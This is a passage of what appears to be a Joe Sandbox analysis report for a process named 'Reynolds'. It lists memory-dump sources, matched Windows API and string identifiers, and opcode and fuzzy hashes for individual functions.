                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmp
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: msctls_trackbar32
                                                                                                      • API String ID: 1025951953-1010561917
                                                                                                      • Opcode ID: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                      • Instruction ID: 50f93d33aca7e7cc483ab38b40f35c8e0add362365107d9d8660ed0ba7570a8b
                                                                                                      • Opcode Fuzzy Hash: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                      • Instruction Fuzzy Hash: 3E312972A09681DBE3609F15F444B5AB7A1F788B90F554279EB9803B64CF38D842CB14
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2280078643-1018135373
                                                                                                      • Opcode ID: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                      • Instruction ID: 03295f04609645be29299de6a39b3b551d44c707bb698c12494ab5301c4d2bf5
                                                                                                      • Opcode Fuzzy Hash: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                      • Instruction Fuzzy Hash: 3C213A36A09641D6E631AB11F04066EF770F784B64F824669DF9D077A9CF3DE886CB10
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: msvcrt.dll$vsprintf_s
                                                                                                      • API String ID: 1646373207-1988861753
                                                                                                      • Opcode ID: c170bdf9de4795b3e807faf33673cebfa0616c7fbbb8f4b28fd9d82f7f5b2bed
                                                                                                      • Instruction ID: bd1298542a8c0a53371a974a359bf4132fe089d0f473d4fbafde015d83372415
                                                                                                      • Opcode Fuzzy Hash: c170bdf9de4795b3e807faf33673cebfa0616c7fbbb8f4b28fd9d82f7f5b2bed
                                                                                                      • Instruction Fuzzy Hash: 84F03C22301E2493ED068F92FCAC6902A61B769BD1F444462AD8E53B62EA38C5C6C300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: msvcrt.dll$vsprintf_s
                                                                                                      • API String ID: 1646373207-1988861753
                                                                                                      • Opcode ID: be6fae490bca3bf3f48884fcaf50d5a2afb0013b4304e3fa71c39259847c8bdf
                                                                                                      • Instruction ID: 89bf3775357e8462e38537bd42b0cba5837f899f110ff8b4b4657f72b170a9f7
                                                                                                      • Opcode Fuzzy Hash: be6fae490bca3bf3f48884fcaf50d5a2afb0013b4304e3fa71c39259847c8bdf
                                                                                                      • Instruction Fuzzy Hash: EDF0F922301F2493ED06CF92FCAC6902A60B769BD1F4444729D8E53B62EA7CC5C6C300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: msvcrt.dll$strerror_s
                                                                                                      • API String ID: 1646373207-1151979360
                                                                                                      • Opcode ID: a872cb84f38791f9cbc95820ea33779f62d02292e93b4a49b54b6c31097f03e9
                                                                                                      • Instruction ID: e841f25b9690492ddf6747131b2cd411ccd53270ba47eb4cbcf30252f662eb48
                                                                                                      • Opcode Fuzzy Hash: a872cb84f38791f9cbc95820ea33779f62d02292e93b4a49b54b6c31097f03e9
                                                                                                      • Instruction Fuzzy Hash: 20F03A66305E3593EE168F86FD6C6A02BA5B759BD4F4441A19C8E43B66EA3CC4C98340
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: msvcrt.dll$strerror_s
                                                                                                      • API String ID: 1646373207-1151979360
                                                                                                      • Opcode ID: 78e8e9579174cfe3d9221c1e12294a1ca8a3da3f77a020aac9a97917498637f9
                                                                                                      • Instruction ID: 9ac570d497ecc518d760d6c4641120f2e9d2508d1e04509292d7df6cf398a86d
                                                                                                      • Opcode Fuzzy Hash: 78e8e9579174cfe3d9221c1e12294a1ca8a3da3f77a020aac9a97917498637f9
                                                                                                      • Instruction Fuzzy Hash: 56F09A62301E3093EE068F86FD6C6A02BA0B758BD0F4040A19C8E43B62EA3CC4C98340
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                      • Opcode ID: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                      • Instruction ID: fc214864893f8c8afa10732fc7bbfcc01e317ea7242854d4bb2a3f3b97305d3f
                                                                                                      • Opcode Fuzzy Hash: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                      • Instruction Fuzzy Hash: 3CE0392190AB06D1FF15AB10E454378A2A0BB08B98F850474C91C02360EFBC92AAC350
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                      • Opcode ID: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                      • Instruction ID: 07fbbe625ff8ec4f83fb20d38c809c81f5ad4415385657acd8c2fe8a5eddefef
                                                                                                      • Opcode Fuzzy Hash: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                      • Instruction Fuzzy Hash: E1E0392190AB06D1FB55AB21E444328A2A0AB08B58F850474C91C02364EFBC96A6C310
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                      • API String ID: 2574300362-192647395
                                                                                                      • Opcode ID: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                      • Instruction ID: 62c04a96615c10bebfac3be025221f3aa7ac4055c1f0c4dc852a5ab09db7ab51
                                                                                                      • Opcode Fuzzy Hash: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                      • Instruction Fuzzy Hash: 87E0392190AB06E1FB16AB10F444328A3B0AB08B58FC604B8C91D423A4EFBC92968310
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                      • Instruction ID: 974a5f0d436d9c41ec018ad0573c9645d19fa9be29a3cd9965865687261d3b9a
                                                                                                      • Opcode Fuzzy Hash: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                      • Instruction Fuzzy Hash: FBD14776B05B56D6EB159F6AD8802AC77B0FB88F88B524462DF0D87B64DF39D842C310
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                      • Instruction ID: 3cfe3270aa8696e9fd3d5715c827aea55657dc3bfd4e9a9dc6b3e537713b52c6
                                                                                                      • Opcode Fuzzy Hash: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                      • Instruction Fuzzy Hash: 15D14B66B06A46EAFB01EF64E4801EC73B1FB58788B8100B5DE0D57B69DF38D52AC350
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,00007FF7AA0F475D,?,?,?,00007FF7AA0F8FCF,?,?,?,?,?,?,?,00007FF7AA0F9D60), ref: 00007FF7AA0F9F34
                                                                                                      • SetFilePointerEx.KERNEL32(?,?,00007FF7AA0F475D,?,?,?,00007FF7AA0F8FCF,?,?,?,?,?,?,?,00007FF7AA0F9D60), ref: 00007FF7AA13D886
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3154509469-0
                                                                                                      • Opcode ID: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                      • Instruction ID: fc93f98e34c3c2b1a070838b82cbdf88149eb4b27e656a20036fb70acc665be4
                                                                                                      • Opcode Fuzzy Hash: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                      • Instruction Fuzzy Hash: 1BB1D472A0AA03D6F766EF11E054239E361FB44B90F9245B5CA9F137A4EF3DE0428320
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: efedc6db8a8de6570b7317df3c38829cd4fe2332aa1d083318f2408eb1a2f197
                                                                                                      • Instruction ID: 77603c76030ab9090f8f682a960c5b5158db0971325441cfb0588a52918677c1
                                                                                                      • Opcode Fuzzy Hash: efedc6db8a8de6570b7317df3c38829cd4fe2332aa1d083318f2408eb1a2f197
                                                                                                      • Instruction Fuzzy Hash: 3F91B373710A718BF73A8E2AD55875ABBA1E714BD0F048155EBD787B92D339E4C18B00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: 6f706c2f9662a9f5d77030e6d5979e72f3f9192043edb250d81c99e22c2424e3
                                                                                                      • Instruction ID: e0be223d3d4cd0e78fc99684930cf9fc410320b672575407985ceb54733f4db8
                                                                                                      • Opcode Fuzzy Hash: 6f706c2f9662a9f5d77030e6d5979e72f3f9192043edb250d81c99e22c2424e3
                                                                                                      • Instruction Fuzzy Hash: 56919F73A02AB18BF73A8E6AE55C76A7BE1E7147D4F048155CBD747BC2D628E8C18700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$localeconvstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1629795015-0
                                                                                                      • Opcode ID: 2441d44a64f54eac264ff3ea01819bb6f544c7ddd3aefe14e0d908759fd2c1c3
                                                                                                      • Instruction ID: 8bbcfdbba48425d742b2652b7dbdbb45dcd140c6a6d5a39298b761fbb1140af3
                                                                                                      • Opcode Fuzzy Hash: 2441d44a64f54eac264ff3ea01819bb6f544c7ddd3aefe14e0d908759fd2c1c3
                                                                                                      • Instruction Fuzzy Hash: FB612417209BF147E7139F1652893ADAF83B7627C1F4881A2CBC707B83D66AC0DA9310
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalLeaveSectionfreememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1662925646-3916222277
                                                                                                      • Opcode ID: ce4a49f96bda839becf80caacf2f5005059100abfa65e5ed32089ffff8e3bfae
                                                                                                      • Instruction ID: 69bb583ab3a0eb36ca8ed25d3cf34691c8a89160be19ccd825b937e5a2913bd9
                                                                                                      • Opcode Fuzzy Hash: ce4a49f96bda839becf80caacf2f5005059100abfa65e5ed32089ffff8e3bfae
                                                                                                      • Instruction Fuzzy Hash: 3A41E3A3600E6487EA278F65E5582AC7B61F7447E4F4083A1DAAB437D2DB38D9D6C700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1352109105-0
                                                                                                      • Opcode ID: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                      • Instruction ID: 2b346a77218a51e89d03519cd55948efc3dc10dc1a20a601f00523ecb8fa2818
                                                                                                      • Opcode Fuzzy Hash: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                      • Instruction Fuzzy Hash: CA418232A0AB56E1FB92AF15E844938B3B1FB44B54F960176DA1D832B0DF38E442C351
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                      • String ID:
                                                                                                      • API String ID: 3076010158-0
                                                                                                      • Opcode ID: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                      • Instruction ID: 24cc6007fe38bff7c21e960ac0f8b1ccfc5abae1514f654728001ad0bac36421
                                                                                                      • Opcode Fuzzy Hash: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                      • Instruction Fuzzy Hash: CC41BB32A09A81EAFB20DF22E4805AD77B5FB44B84F96407ADE0D13764CF38E956C710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 4141327611-0
                                                                                                      • Opcode ID: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                      • Instruction ID: d07873f1ba010b7a668d5d9fb2a26ebdb600651bfaa5caa058fdb1009790c42c
                                                                                                      • Opcode Fuzzy Hash: e3b76c81e184928a19d82946b11eb0fa6c3ced191be995ebd8011999c3bc7ce9
                                                                                                      • Instruction Fuzzy Hash: 4041A461A0E642E6FB67AF10F040379E6B0EF80B90F969171DB5D067A5DE2CD44B8720
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3340791633-0
                                                                                                      • Opcode ID: 8534e56cbfa9c923cdf90f1edd83f1c731ffea0719ea79c7905dbe4df23172ef
                                                                                                      • Instruction ID: 42a17ecd4e161042fa083ebea91a7e0035c55a9a45bb4f08f2a8d53dca89be48
                                                                                                      • Opcode Fuzzy Hash: 8534e56cbfa9c923cdf90f1edd83f1c731ffea0719ea79c7905dbe4df23172ef
                                                                                                      • Instruction Fuzzy Hash: E8419531E0A546EAFB66AB15E4446F8F772AB40B94F9A4072E65E436F1CE3CE543C310
                                                                                                      APIs
